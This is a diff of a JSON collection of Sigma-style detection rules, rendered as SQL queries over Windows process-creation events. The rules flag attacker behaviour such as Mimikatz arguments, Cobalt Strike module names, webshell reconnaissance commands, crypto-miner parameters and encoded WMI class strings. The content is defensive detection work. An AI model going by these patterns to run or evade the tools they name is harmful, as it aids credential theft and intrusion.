"falsepositives": [ - "Unknown" + "Legitimate activity is expected since compressing files with a password is common." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1047" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. 
Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "id": "bab049ca-7471-4828-9024-38279a4c04da", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", "status": "experimental", - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "author": "Janantha Marasinghe", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_execution.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + 
"Some build frameworks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for 
CVE-2017-8759", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", + "status": "test", + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "status": "test", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 
'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", - "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' 
ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects 
usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "status": "experimental", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects the use of the WMI command-line 
(WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.t1082" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unlikely" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' 